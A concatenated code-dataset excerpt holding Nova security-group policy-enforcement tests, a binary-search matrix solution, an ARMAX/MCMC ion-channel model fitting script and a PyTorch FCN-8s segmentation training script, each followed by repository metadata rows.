        self.controller.detail(self.req, None)
class PolicyEnforcementV21(test.NoDBTestCase):
    """Base class verifying that an API call is rejected when the
    os-security-groups policy does not match the request's project."""

    def setUp(self):
        super(PolicyEnforcementV21, self).setUp()
        self.req = fakes.HTTPRequest.blank('')
        self.rule_name = "os_compute_api:os-security-groups"
        self.rule = {self.rule_name: "project:non_fake"}

    def _common_policy_check(self, func, *arg, **kwarg):
        # Install the non-matching rule, call the API, and verify both
        # the exception type and its message mention the denied rule.
        self.policy.set_rules(self.rule)
        exc = self.assertRaises(
            exception.PolicyNotAuthorized, func, *arg, **kwarg)
        expected_msg = ("Policy doesn't allow %s to be performed." %
                        self.rule_name)
        self.assertEqual(expected_msg, exc.format_message())
class SecurityGroupPolicyEnforcementV21(PolicyEnforcementV21):
    # Policy checks for every action on the main security-group controller.
    def setUp(self):
        super(SecurityGroupPolicyEnforcementV21, self).setUp()
        self.controller = secgroups_v21.SecurityGroupController()
    def test_create_policy_failed(self):
        self._common_policy_check(self.controller.create, self.req, {})
    def test_show_policy_failed(self):
        self._common_policy_check(self.controller.show, self.req, FAKE_UUID1)
    def test_delete_policy_failed(self):
        self._common_policy_check(self.controller.delete, self.req, FAKE_UUID1)
    def test_index_policy_failed(self):
        self._common_policy_check(self.controller.index, self.req)
    def test_update_policy_failed(self):
        self._common_policy_check(
            self.controller.update, self.req, FAKE_UUID1, {})
class ServerSecurityGroupPolicyEnforcementV21(PolicyEnforcementV21):
    # Policy check for listing a server's security groups.
    def setUp(self):
        super(ServerSecurityGroupPolicyEnforcementV21, self).setUp()
        self.controller = secgroups_v21.ServerSecurityGroupController()
    def test_index_policy_failed(self):
        self._common_policy_check(self.controller.index, self.req, FAKE_UUID1)
class SecurityGroupRulesPolicyEnforcementV21(PolicyEnforcementV21):
    # Policy checks for the security-group-rules controller.
    def setUp(self):
        super(SecurityGroupRulesPolicyEnforcementV21, self).setUp()
        self.controller = secgroups_v21.SecurityGroupRulesController()
    def test_create_policy_failed(self):
        self._common_policy_check(self.controller.create, self.req, {})
    def test_delete_policy_failed(self):
        self._common_policy_check(self.controller.delete, self.req, FAKE_UUID1)
class SecurityGroupActionPolicyEnforcementV21(PolicyEnforcementV21):
    # Policy checks for the add/remove server-action extensions.
    def setUp(self):
        super(SecurityGroupActionPolicyEnforcementV21, self).setUp()
        self.controller = secgroups_v21.SecurityGroupActionController()
    def test_add_security_group_policy_failed(self):
        self._common_policy_check(
            self.controller._addSecurityGroup, self.req, FAKE_UUID1, {})
    def test_remove_security_group_policy_failed(self):
        self._common_policy_check(
            self.controller._removeSecurityGroup, self.req, FAKE_UUID1, {})
| 43.359666 | 79 | 0.628031 |
cc6dd4cedf162e0d6045353175329f3457dc8a08 | 1,491 | py | Python | pythonAlgorithm/binarysearch/Search a 2D Matrix.py | Sky-zzt/lintcodePractice | d6436b296c5865d85e55c8ad4fcdbb0165d4ebb1 | [
"MIT"
] | 1 | 2020-09-15T07:58:55.000Z | 2020-09-15T07:58:55.000Z | pythonAlgorithm/binarysearch/Search a 2D Matrix.py | Sky-zzt/lintcodePractice | d6436b296c5865d85e55c8ad4fcdbb0165d4ebb1 | [
"MIT"
] | null | null | null | pythonAlgorithm/binarysearch/Search a 2D Matrix.py | Sky-zzt/lintcodePractice | d6436b296c5865d85e55c8ad4fcdbb0165d4ebb1 | [
"MIT"
] | null | null | null | class Solution:
"""
@param matrix: matrix, a list of lists of integers
@param target: An integer
@return: a boolean, indicate whether matrix contains target
"""
def searchMatrix(self, matrix, target):
# write your code here
m = len(matrix)
n = len(matrix[0])
start = 0
end = m - 1
while start + 1 < end:
mid = (start + end) // 2
if matrix[mid][n - 1] < target:
start = mid
elif matrix[mid][n - 1] > target:
end = mid
elif matrix[mid][n - 1] == target:
return True
if matrix[start][n - 1] >= target: # todo 是>= do not forget
return self.bs(matrix[start], target)
else:
return self.bs(matrix[end], target)
def bs(self, nums, target):
# write your code here
if not nums: return False
l = len(nums)
start = 0
# todo need to l-1 or line 35 will be wrong
end = l - 1
while start + 1 < end:
mid = (start + end) // 2
if nums[mid] == target:
return True
elif nums[mid] < target:
start = mid
elif nums[mid] > target:
end = mid
if nums[start] == target:
return True
if nums[end] == target:
return True
return False
# Quick manual smoke check of the solver.
solver = Solution()
solver.searchMatrix([[1, 3, 5, 7], [10, 11, 16, 20], [23, 30, 34, 50]], 7)
| 29.82 | 67 | 0.482897 |
19f465f23132b4202c125d076fea797f7e1d3a26 | 9,864 | py | Python | ion-channel-models/mcmc_arma.py | sanmitraghosh/fickleheart-method-tutorials | d5ee910258a2656951201d4ada2a412804013bd5 | [
"BSD-3-Clause"
] | null | null | null | ion-channel-models/mcmc_arma.py | sanmitraghosh/fickleheart-method-tutorials | d5ee910258a2656951201d4ada2a412804013bd5 | [
"BSD-3-Clause"
] | null | null | null | ion-channel-models/mcmc_arma.py | sanmitraghosh/fickleheart-method-tutorials | d5ee910258a2656951201d4ada2a412804013bd5 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
from __future__ import print_function
import sys
sys.path.append('./method')
import os
import numpy as np
import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pints
import pints.io
import pints.plot
import pymc3 as pm
import statsmodels.api as sm
import random
from sklearn.externals import joblib
from statsmodels.tsa.arima_process import arma2ma
from statsmodels.tsa.tsatools import _ar_transparams, _ar_invtransparams, _ma_transparams, _ma_invtransparams
import model as m
import parametertransform
import priors
from priors import HalfNormalLogPrior, InverseGammaLogPrior, ArmaNormalCentredLogPrior, ArmaNormalLogPrior
from armax_ode_tsa_likelihood import DiscrepancyLogLikelihood
"""
Run fit.
Note for Chon: Here I am using ARMA(2,2) but we need to fit ARMA(1,2), ARMA(2,1), ARMA(1,1) as well
and compare there Deviance information criteria, which this script calculates at the end
"""
print('Using PyMC3 version: ',str(pm.__version__))
model_list = ['A', 'B', 'C']
try:
which_model = 'A'#sys.argv[1]
except:
print('Usage: python %s [str:which_model]' % os.path.basename(__file__))
sys.exit()
if which_model not in model_list:
raise ValueError('Input model %s is not available in the model list' \
% which_model)
# Get all input variables
import importlib
sys.path.append('./mmt-model-files')
info_id = 'model_%s' % which_model
info = importlib.import_module(info_id)
data_dir = './data'
savedir = './out/mcmc-' + info_id
if not os.path.isdir(savedir):
os.makedirs(savedir)
data_file_name = 'data-sinewave.csv'
print('Fitting to ', data_file_name)
print('Temperature: ', info.temperature)
saveas = info_id + '-' + data_file_name[5:][:-4]
# Protocol
protocol = np.loadtxt('./protocol-time-series/sinewave.csv', skiprows=1,
delimiter=',')
protocol_times = protocol[:, 0]
protocol = protocol[:, 1]
# Control fitting seed
# fit_seed = np.random.randint(0, 2**30)
fit_seed = 542811797
print('Fit seed: ', fit_seed)
np.random.seed(fit_seed)
# Set parameter transformation
transform_to_model_param = parametertransform.log_transform_to_model_param
transform_from_model_param = parametertransform.log_transform_from_model_param
# Load data
data = np.loadtxt(data_dir + '/' + data_file_name,
delimiter=',', skiprows=1) # headers
times = data[:, 0]
data = data[:, 1]
noise_sigma = np.log(np.std(data[:500]))
print('Estimated noise level: ', noise_sigma)
model = m.Model(info.model_file,
variables=info.parameters,
current_readout=info.current_list,
set_ion=info.ions_conc,
transform=transform_to_model_param,
temperature=273.15 + info.temperature, # K
)
LogPrior = {
'model_A': priors.ModelALogPrior,
'model_B': priors.ModelBLogPrior,
}
# Update protocol
model.set_fixed_form_voltage_protocol(protocol, protocol_times)
# Fit an armax model to get ballpark estmates of starting arma parameters
# I have hard-coded to an ARMA(2,2) model, maybe worth using user iputs
transparams = False ################# <-----Changed 21/10 #####################
debug = True
if not debug:
print('Fitting an ARMAX (', str(2),',',str(2),') model')
cmaes_params = np.copy(np.log(info.base_param))
exog_current = model.simulate(cmaes_params, times)#[:,None]
armax_mod = sm.tsa.ARMA(data, order=(2,2), exog=exog_current)
armax_result = armax_mod.fit(trend='nc', transparams= True, solver='cg')
n_arama = len(armax_result.params[armax_result.k_exog:])
print(armax_result.summary())
joblib.dump(armax_result, './out/armax.pkl', compress=3)
else:
cmaes_params = np.copy(np.log(info.base_param))
exog_current = model.simulate(cmaes_params, times)[:,None]
armax_result = joblib.load('./out/armax.pkl')
n_arama = len(armax_result.params[armax_result.k_exog:])
# Create Pints stuffs
problem = pints.SingleOutputProblem(model, times, data)
loglikelihood = DiscrepancyLogLikelihood(problem, armax_result, transparams=transparams) ################# <-----Changed 21/10 #####################
logmodelprior = LogPrior[info_id](transform_to_model_param,
transform_from_model_param)
# Priors for discrepancy
logarmaprior = ArmaNormalCentredLogPrior(armax_result, 0.25) # Note for Chon: Worth checking out more wider/narrower priors
logprior = pints.ComposedLogPrior(logmodelprior, logarmaprior)
logposterior = pints.LogPosterior(loglikelihood, logprior)
# Check logposterior is working fine
init_arma_ar = _ar_transparams(armax_result.arparams.copy()) ################# <-----Changed 21/10 #####################
init_arma_ma = _ma_transparams(armax_result.maparams.copy()) ################# <-----Changed 21/10 #####################
init_arma = np.append(init_arma_ar, init_arma_ma) ################# <-----Changed 21/10 #####################
priorparams = np.copy(info.base_param)
transform_priorparams = transform_from_model_param(priorparams)
priorparams = np.append(priorparams, init_arma)
transform_priorparams = np.append(transform_priorparams, init_arma)
print('Posterior at prior parameters: ',
logposterior(transform_priorparams))
for _ in range(10):
assert(logposterior(transform_priorparams) ==\
logposterior(transform_priorparams))
# Load fitting results: one CMA-ES solution per chain as starting points.
calloaddir = './out/' + info_id
load_seed = 542811797
fit_idx = [1, 2, 3]
transform_x0_list = []
print('MCMC starting point: ')
for i in fit_idx:
    f = '%s/%s-solution-%s-%s.txt' % (calloaddir, 'sinewave', load_seed, i)
    p = np.loadtxt(f)
    # Each start is (transformed model params, initial ARMA params).
    transform_x0_list.append(np.append(transform_from_model_param(p),
            init_arma))
    print(transform_x0_list[-1])
    print('Posterior: ', logposterior(transform_x0_list[-1]))
# Run
mcmc = pints.MCMCController(logposterior, len(transform_x0_list),
        transform_x0_list, method=pints.AdaptiveCovarianceMCMC)
n_iter = 1000 # Need higher iterations in my experience
mcmc.set_max_iterations(n_iter)
# Only use 100/200 random-walk iterations before switching to Adaptive.
mcmc.set_initial_phase_iterations(int(200))
mcmc.set_parallel(False)
mcmc.set_chain_filename('%s/%s-chain.csv' % (savedir, saveas))
mcmc.set_log_pdf_filename('%s/%s-pdf.csv' % (savedir, saveas))
chains = mcmc.run()
# De-transform parameters: model params back to their natural scale;
# ARMA (discrepancy) params stay in the sampling space.
chains_param = np.zeros(chains.shape)
for i, c in enumerate(chains):
    c_tmp = np.copy(c)
    chains_param[i, :, :-n_arama] = transform_to_model_param(c_tmp[:, :-n_arama]) # First the model ones
    chains_param[i, :, -n_arama:] = c_tmp[:, -n_arama:] # Then the discrepancy ones
    del(c_tmp)
# Save (de-transformed version)
pints.io.save_samples('%s/%s-chain.csv' % (savedir, saveas), *chains_param)
# Plot
# Burn in (drop first half) and thinning (step 1, i.e. none).
chains_final = chains[:, int(0.5 * n_iter)::1, :]
chains_param = chains_param[:, int(0.5 * n_iter)::1, :]
transform_x0 = transform_x0_list[0]
x0 = np.append(transform_to_model_param(transform_x0[:-n_arama]), transform_x0[-n_arama:])
pints.plot.pairwise(chains_param[0], kde=False, ref_parameters=x0)
plt.savefig('%s/%s-fig1.png' % (savedir, saveas))
plt.close('all')
pints.plot.trace(chains_param, ref_parameters=x0)
plt.savefig('%s/%s-fig2.png' % (savedir, saveas))
plt.close('all')
# Bayesian prediction of ARMAX based on the variance identity.
# With theta = (ode_params, arma_params) and p(theta|data) the posterior,
# we approximate the posterior predictive mean E[armax_forecast|data] and
# variance Var[armax_forecast|data] (law of total variance) by averaging
# forecasts over 400 random posterior samples.
ppc_samples = chains_param[0]
armax_mean = []
armax_sd = []
pdic = []
for ind in random.sample(range(0, np.size(ppc_samples, axis=0)), 400):
    ode_params = transform_from_model_param(ppc_samples[ind, :-n_arama])
    ode_sol = model.simulate(ode_params, times)
    # Prepend the exogenous (ODE current) coefficient, fixed at 1.0.
    armax_params = np.append(1.0, ppc_samples[ind, -n_arama:])
    armax_result.params = armax_params
    armax_result.arparams = armax_params[armax_result.k_exog:armax_result.k_ar + armax_result.k_exog]
    armax_result.maparams = armax_params[-armax_result.k_ma:]
    armax_result.model.exog = exog_current
    mean, sd, _ = armax_result.forecast(steps=len(times), exog=ode_sol)
    armax_result.model.exog = ode_sol[:, None]
    armax_result.model.transparams = transparams ################# <-----Changed 21/10 #####################
    ll = armax_result.model.loglike_kalman(armax_params)
    # Fix: the original used "ll is not np.inf and ll is not np.nan",
    # which is an identity (object) comparison and never filters out
    # non-finite log-likelihoods; use a proper finiteness check.
    if np.isfinite(ll):
        pdic.append(ll)
    armax_mean.append(mean)
    armax_sd.append(sd)
armax_mean = np.array(armax_mean)
armax_sd = np.array(armax_sd)
ppc_mean = np.mean(armax_mean, axis=0)
# Law of total variance: E[Var] + Var[E] (= E[mean^2] - (E[mean])^2).
var1, var2, var3 = np.mean(armax_sd**2, axis=0), np.mean(armax_mean**2, axis=0), (np.mean(armax_mean, axis=0))**2
ppc_sd = np.sqrt(var1 + var2 - var3)
plt.figure(figsize=(8, 6))
plt.plot(times, data, label='Model C')
plt.plot(times, ppc_mean, label='Mean')
plt.plot(times, ppc_mean + 2*ppc_sd, '-', color='blue',
        lw=0.5, label='conf_int')
plt.plot(times, ppc_mean - 2*ppc_sd, '-', color='blue',
        lw=0.5)
plt.legend()
plt.xlabel('Time (ms)')
plt.ylabel('Current (pA)')
plt.show()
# Calculation of DIC: DIC = -2*loglike(theta_bar) + 2*pD, with the
# effective number of parameters pD = 2*(loglike(theta_bar) - mean_ll).
theta_bar = np.mean(ppc_samples, axis=0)
ode_params = transform_from_model_param(theta_bar[:-n_arama])
ode_sol = model.simulate(ode_params, times)
armax_params = np.append(1.0, theta_bar[-n_arama:])
armax_result.model.exog = ode_sol[:, None]
armax_result.model.transparams = True
pdic = np.mean(pdic)
pdic = 2.0*(armax_result.model.loglike_kalman(armax_params) - pdic)
DIC = -2.0 * armax_result.model.loglike_kalman(armax_params) + 2*pdic
print('DIC for ARMAX(2,2): ', DIC)
ec69ed5954ff64e87618e708e8d53a74a7066a44 | 13,493 | py | Python | myfcn.py | wdmwhh/FCN-8s | 8ff6a7a33e2a1d27530fb5a5d4019b0786000629 | [
"MIT"
] | 1 | 2020-06-03T09:19:03.000Z | 2020-06-03T09:19:03.000Z | myfcn.py | wdmwhh/FCN-8s | 8ff6a7a33e2a1d27530fb5a5d4019b0786000629 | [
"MIT"
] | null | null | null | myfcn.py | wdmwhh/FCN-8s | 8ff6a7a33e2a1d27530fb5a5d4019b0786000629 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Dec 1 19:55:09 2018
FCN-VGG16-8s
@author: WDMWHH
"""
from __future__ import print_function, division
from torch.optim import lr_scheduler
from torchvision import transforms, models
from torch.utils.data import Dataset, DataLoader
from PIL import Image
from scipy import ndimage
from tqdm import tqdm
import os
import time
import torch
import numpy as np
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import matplotlib.pyplot as plt
# Root of the VOC2012 dataset, resolved from an interactive prompt.
datadir = input('data directory: ') # public server
voc_root = os.path.join(datadir, 'VOC2012')
def read_images(root_dir, train):
    """Return (image_paths, label_paths) for the chosen dataset split.

    Reads the id list from ``<root_dir>/Segmentation/sbdtrain.txt`` when
    ``train`` is truthy, else ``seg11valid.txt``, and maps each id to its
    JPEG image and PNG segmentation label.

    Uses os.path.join instead of manual '/' concatenation so the paths
    are built portably.
    """
    split_file = 'sbdtrain.txt' if train else 'seg11valid.txt'
    txt_fname = os.path.join(root_dir, 'Segmentation', split_file)
    with open(txt_fname, 'r') as f:
        images = f.read().split()
    data_list = [os.path.join(root_dir, 'JPEGImages', i + '.jpg')
                 for i in images]
    label_list = [os.path.join(root_dir, 'SegmentationClass', i + '.png')
                  for i in images]
    return data_list, label_list
class VOCDataset(Dataset):
    """VOC2012 segmentation dataset of (image, label) PIL pairs."""

    def __init__(self, root_dir=voc_root, train=True, trsf=None):
        self.root_dir = root_dir
        self.trsf = trsf
        self.data_list, self.label_list = read_images(root_dir, train)

    def __len__(self):
        return len(self.data_list)

    def __getitem__(self, idx):
        img_path = self.data_list[idx]
        lbl_path = self.label_list[idx]
        img = Image.open(img_path).convert('RGB')
        lbl = Image.open(lbl_path)
        sample = {'image': img, 'label': lbl}
        # Apply the optional joint transform to the whole sample dict.
        return self.trsf(sample) if self.trsf else sample
class ToTensor(object):
    """Convert a PIL sample dict into tensors (image float, label int)."""

    def __call__(self, sample):
        img = transforms.ToTensor()(sample['image'])
        lbl = torch.from_numpy(np.array(sample['label'], dtype='int'))
        return {'image': img, 'label': lbl}
class Normalize(object):
    """Channel-normalize the image tensor; the label passes through."""

    def __init__(self, mean = [0., 0., 0.], std = [1., 1., 1.]):
        self.mean = mean
        self.std = std

    def __call__(self, sample):
        normed = transforms.Normalize(self.mean, self.std)(sample['image'])
        return {'image': normed, 'label': sample['label']}
# Build a bilinear-interpolation kernel (used to seed ConvTranspose2d).
def bilinear_kernel(in_channels, out_channels, kernel_size):
    '''
    Return a (in_channels, out_channels, k, k) float32 tensor whose
    [i, i] planes hold a bilinear upsampling filter (off-diagonal
    channel pairs are zero).
    '''
    factor = (kernel_size + 1) // 2
    center = factor - 1 if kernel_size % 2 == 1 else factor - 0.5
    og = np.ogrid[:kernel_size, :kernel_size]
    filt = ((1 - abs(og[0] - center) / factor) *
            (1 - abs(og[1] - center) / factor))
    weight = np.zeros((in_channels, out_channels, kernel_size, kernel_size),
                      dtype='float32')
    weight[range(in_channels), range(out_channels), :, :] = filt
    return torch.from_numpy(weight)
class FCN_vgg16(nn.Module):
    """FCN-8s built on a pretrained VGG16 backbone.

    Skip connections fuse pool3 (1/8), pool4 (1/16) and the fc7 output
    (1/32); the fused score map is upsampled 8x back to input size.
    """
    def __init__(self, num_category):
        super(FCN_vgg16, self).__init__()
        model_ft = models.vgg16(pretrained=True)
        features = list(model_ft.features.children())
        # Replace conv1 with padding=100 (FCN trick: allows arbitrary
        # input sizes; the excess is cropped off in forward()).
        conv1 = nn.Conv2d(3, 64, 3, 1, 100)
        conv1.weight.data = features[0].weight.data
        conv1.bias.data = features[0].bias.data
        features[0] = conv1
        # ceil_mode=True so odd feature-map sizes round up when pooling.
        features[4] = nn.MaxPool2d(2, 2, ceil_mode=True)
        features[9] = nn.MaxPool2d(2, 2, ceil_mode=True)
        features[16] = nn.MaxPool2d(2, 2, ceil_mode=True)
        features[23] = nn.MaxPool2d(2, 2, ceil_mode=True)
        features[30] = nn.MaxPool2d(2, 2, ceil_mode=True)
        self.stage1 = nn.Sequential(*features[:17]) # stage 1 (through pool3)
        self.stage2 = nn.Sequential(*features[17:24]) # stage 2 (through pool4)
        self.stage3 = nn.Sequential(*features[24:]) # stage 3 (through pool5)
        #fc6, fc7
        # VGG's fully-connected fc6/fc7 become 7x7 and 1x1 convolutions.
        fc = list(model_ft.classifier.children())
        fc6 = nn.Conv2d(512, 1024, 7)
        fc7 = nn.Conv2d(1024, 1024, 1)
        fc[0] = fc6
        fc[3] = fc7
        self.fc = nn.Sequential(*fc[:6])
        # 1x1 score heads for each skip level.
        self.scores1 = nn.Conv2d(1024, num_category, 1) #
        self.scores2 = nn.Conv2d(512, num_category, 1)
        self.scores3 = nn.Conv2d(256, num_category, 1)
        for layer in [self.scores1, self.scores2, self.scores3]:
            nn.init.kaiming_normal_(layer.weight, a=1)
            nn.init.constant_(layer.bias, 0)
        self.upsample_8x = nn.ConvTranspose2d(num_category, num_category, 16, 8, bias=False)
        self.upsample_8x.weight.data = bilinear_kernel(num_category, num_category, 16) # use bilinear kernel
        self.upsample_4x = nn.ConvTranspose2d(num_category, num_category, 4, 2, bias=False)
        self.upsample_4x.weight.data = bilinear_kernel(num_category, num_category, 4) # use bilinear kernel
        self.upsample_2x = nn.ConvTranspose2d(num_category, num_category, 4, 2, bias=False)
        self.upsample_2x.weight.data = bilinear_kernel(num_category, num_category, 4) # use bilinear kernel
    def forward(self, x):
        # Returns per-pixel class scores with the same HxW as the input.
        h = self.stage1(x)
        s1 = h # 1/8
        h = self.stage2(h)
        s2 = h # 1/16
        h = self.stage3(h)
        h = self.fc(h)
        s3 = h # 1/32
        s3 = self.scores1(s3)
        s3 = self.upsample_2x(s3)
        # Skip scores are scaled down (1e-2 / 1e-4) before fusion, and
        # centre-cropped (offsets 5 and 9) to match the coarser map —
        # offsets follow the original FCN crop arithmetic for pad=100.
        s2 = self.scores2(s2*1e-2)
        s2 = s2[:, :, 5:5+s3.size()[2], 5:5+s3.size()[3]].contiguous()
        s2 = s2 + s3
        s2 = self.upsample_4x(s2)
        s1 = self.scores3(s1*1e-4)
        s1 = s1[:, :, 9:9+s2.size()[2], 9:9+s2.size()[3]].contiguous()
        s = s1 + s2
        s = self.upsample_8x(s)
        # Final crop (offset 31) removes the padding introduced by pad=100.
        s = s[:, :, 31:31+x.size()[2], 31:31+x.size()[3]].contiguous()
        return s
    def get_params(self, split):
        # Yield conv weights or biases (split == 'weight' / anything else)
        # so the optimizer can apply different hyper-parameters to each.
        for layer in self.modules():
            if isinstance(layer, nn.Conv2d):
                if split == 'weight':
                    yield layer.weight
                else:
                    yield layer.bias
            elif isinstance(layer, nn.ConvTranspose2d) and split == 'weight':
                yield layer.weight
def fast_hist(label_pred, label_gt, num_category):
    """Confusion histogram: rows index prediction, columns ground truth.

    Ground-truth values outside [0, num_category) are ignored.
    """
    valid = (label_gt >= 0) & (label_gt < num_category)  # include background
    combined = num_category * label_pred[valid] + label_gt[valid].astype(int)
    counts = np.bincount(combined, minlength=num_category ** 2)
    return counts.reshape(num_category, num_category)
def evaluation_metrics(label_preds, label_gts, num_category):
    """Compute segmentation metrics over paired prediction/label arrays.

    Args:
        label_preds: iterable of predicted label arrays.
        label_gts: iterable of ground-truth label arrays (255 marks void).
        num_category: number of classes, background included.

    Returns:
        Tuple of (pixel accuracy, mean per-class accuracy, mean IoU,
        frequency-weighted IoU).
    """
    hist = np.zeros((num_category, num_category))
    for p, g in zip(label_preds, label_gts):
        # Drop void/out-of-range pixels. Fix: use num_category instead of the
        # previous hard-coded 21 so the function works for any class count
        # (identical behavior for the VOC 20+1 case).
        valid = (g >= 0) & (g < num_category)
        hist += fast_hist(p[valid], g[valid], num_category)
    # Overall pixel accuracy: correctly-classified pixels / all pixels.
    acc = np.diag(hist).sum() / hist.sum()
    with np.errstate(divide='ignore', invalid='ignore'):
        # hist rows are predictions and columns ground truth, so axis=0 sums
        # over predictions for each ground-truth class; empty classes yield
        # NaN and are skipped by nanmean.
        macc = np.diag(hist) / hist.sum(axis=0)
        macc = np.nanmean(macc)
    with np.errstate(divide='ignore', invalid='ignore'):
        # IoU per class: intersection / (union = gt + pred - intersection).
        iou = np.diag(hist) / (hist.sum(axis=0) + hist.sum(axis=1) - np.diag(hist))
    miou = np.nanmean(iou)
    # Weight each class's IoU by its ground-truth pixel frequency.
    freq = hist.sum(axis=0) / hist.sum()
    fwiou = (freq[freq > 0] * iou[freq > 0]).sum()
    return acc, macc, miou, fwiou
#%%
def main():
    """Train FCN-vgg16 on Pascal VOC, evaluate it, and save model/plots.

    Side effects: writes 'myfcn.pth' under ``datadir`` and 'val0_6.jpg' in
    the working directory. Requires CUDA (tensors are moved with .cuda()).
    """
    #%% Initialize
    # ImageNet mean/std normalization for the VGG16 backbone.
    transforms_train = transforms.Compose([
        ToTensor(),
        Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
    transforms_val = transforms.Compose([
        ToTensor(),
        Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
    voc_data = {'train': VOCDataset(root_dir=voc_root, train=True,
                                    trsf=transforms_train),
                'val': VOCDataset(root_dir=voc_root, train=False,
                                  trsf=transforms_val)}
    # batch_size=1 so variable-sized VOC images need no resizing/collation.
    dataloaders = {'train': DataLoader(voc_data['train'], batch_size=1,
                                       shuffle=True, num_workers=4),
                   'val': DataLoader(voc_data['val'], batch_size=1,
                                     shuffle=False, num_workers=4)}
    dataset_sizes = {x: len(voc_data[x]) for x in ['train', 'val']}
    num_category = 20 + 1  # 20 VOC object classes + background
    myfcn = FCN_vgg16(num_category)
    num_epoch = 20
    # NLLLoss pairs with the explicit log_softmax below; 255 marks void pixels.
    criterion = nn.NLLLoss(ignore_index=255)
    # Weights and biases are optimized with separate LRs / weight decay.
    train_params = [{'params': myfcn.get_params('weight'), 'lr': 1e-4, 'weight_decay': 5e-4},
                    {'params': myfcn.get_params('bias'), 'lr': 2e-4, 'weight_decay': 0}]
    optimizer = optim.SGD(train_params, momentum=0.99)
    # LR decays by gamma=0.9 every 2500 scheduler steps; the scheduler is
    # stepped once per batch below, so this is a per-iteration decay.
    exp_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=2500, gamma=0.9)
    myfcn = nn.DataParallel(myfcn).cuda()
    since = time.time()
    #%% Train
    for t in range(num_epoch):
        myfcn.train()  # Set model to training mode
        tbar = tqdm(dataloaders['train'])
        running_loss = 0
        # Iterate over data.
        for i, sample in enumerate(tbar):
            # NOTE(review): stepping the scheduler before optimizer.step()
            # raises a warning on newer PyTorch -- confirm intended order.
            exp_lr_scheduler.step()
            inputs, labels = sample['image'], sample['label']
            inputs = inputs.cuda()
            labels = labels.cuda()
            # zero the parameter gradients
            optimizer.zero_grad()
            with torch.set_grad_enabled(True):
                # forward
                outputs = myfcn(inputs)
                outputs = F.log_softmax(outputs, dim=1)
                loss = criterion(outputs, labels.long())
                # backward + optimize
                loss.backward()
                optimizer.step()
            # statistics (inputs.size(0) is 1 here since batch_size=1)
            running_loss += loss.item() * inputs.size(0)
        train_loss = running_loss / dataset_sizes['train']
        print('Training Results({}): '.format(t))
        print('Loss: {:4f}'.format(train_loss))
    #%% Save model
    state = {'net':myfcn.state_dict(), 'optimizer':optimizer.state_dict(), 'num_epoch':num_epoch}
    torch.save(state, os.path.join(datadir, 'myfcn.pth'))
    #%% Evaluate
    myfcn.eval()  # Set model to evaluate mode
    running_acc = 0
    running_macc = 0
    running_miou = 0
    running_fwiou = 0
    for sample in tqdm(dataloaders['val']):
        inputs, labels = sample['image'], sample['label']
        inputs = inputs.cuda()
        labels = labels.cuda()
        # forward
        outputs = myfcn(inputs)
        outputs = F.log_softmax(outputs, dim=1)
        preds = outputs.data.cpu().numpy()
        labels = labels.data.cpu().numpy()
        # Bilinearly resize the score maps (N, C, H, W) back to the label
        # resolution before taking the per-pixel argmax over classes.
        h, w = labels.shape[1:]
        ori_h, ori_w = preds.shape[2:]
        preds = np.argmax(ndimage.zoom(preds, (1., 1., 1.*h/ori_h, 1.*w/ori_w), order=1), axis=1)
        for pred, label in zip(preds, labels):
            acc, macc, miou, fwiou = evaluation_metrics(pred, label, num_category)
            running_acc += acc
            running_macc += macc
            running_miou += miou
            running_fwiou += fwiou
    val_acc = running_acc / dataset_sizes['val']
    val_macc = running_macc / dataset_sizes['val']
    val_miou = running_miou / dataset_sizes['val']
    val_fwiou = running_fwiou / dataset_sizes['val']
    time_elapsed = time.time() - since
    print('Training complete in {:.0f}m {:.0f}s'.format(
        time_elapsed // 60, time_elapsed % 60))
    print('Validation Results: ')
    print('Pixel accuracy: {:4f}'.format(val_acc))
    print('Mean accuracy: {:4f}'.format(val_macc))
    print('Mean IoU: {:4f}'.format(val_miou))
    print('frequency weighted IoU: {:4f}'.format(val_fwiou))
    #%% Visualize
    # RGB color for each class; index 21 (white) is used for void pixels.
    colormap = [[0,0,0],[128,0,0],[0,128,0], [128,128,0], [0,0,128],
                [128,0,128],[0,128,128],[128,128,128],[64,0,0],[192,0,0],
                [64,128,0],[192,128,0],[64,0,128],[192,0,128],
                [64,128,128],[192,128,128],[0,64,0],[128,64,0],
                [0,192,0],[128,192,0],[0,64,128],[255, 255, 255]]
    cm = np.array(colormap, dtype='uint8')
    # One row per sample: input image | ground truth | prediction.
    _, figs = plt.subplots(6, 3, figsize=(12, 10))
    for t in range(6):
        val_sample = voc_data['val'][t]
        val_image = val_sample['image'].cuda()
        val_label = val_sample['label']
        val_output = myfcn(val_image.unsqueeze(0))
        val_pred = val_output.max(dim=1)[1].squeeze(0).data.cpu().numpy()
        val_label = val_label.long().data.numpy()
        # Undo the ImageNet normalization for display (CHW -> HWC, uint8).
        val_image = val_image.squeeze().data.cpu().numpy().transpose((1, 2, 0))
        val_image = val_image * [0.229, 0.224, 0.225] + [0.485, 0.456, 0.406]
        val_image *= 255
        val_image = val_image.astype(np.uint8)
        val_pred = cm[val_pred]
        val_label[val_label==255] = 21  # map void pixels to the white entry
        val_label = cm[val_label]
        figs[t, 0].imshow(val_image)
        figs[t, 0].axes.get_xaxis().set_visible(False)
        figs[t, 0].axes.get_yaxis().set_visible(False)
        figs[t, 1].imshow(val_label)
        figs[t, 1].axes.get_xaxis().set_visible(False)
        figs[t, 1].axes.get_yaxis().set_visible(False)
        figs[t, 2].imshow(val_pred)
        figs[t, 2].axes.get_xaxis().set_visible(False)
        figs[t, 2].axes.get_yaxis().set_visible(False)
    plt.savefig('val0_6.jpg')
#%%
# Script entry point: run the full train/evaluate/visualize pipeline.
if __name__ == '__main__':
    main()
| 38.115819 | 102 | 0.573038 |
0a8d406c4a1864175bc2828bef0e797b9dca8231 | 5,335 | py | Python | sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2021_02_01/operations/_usages_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
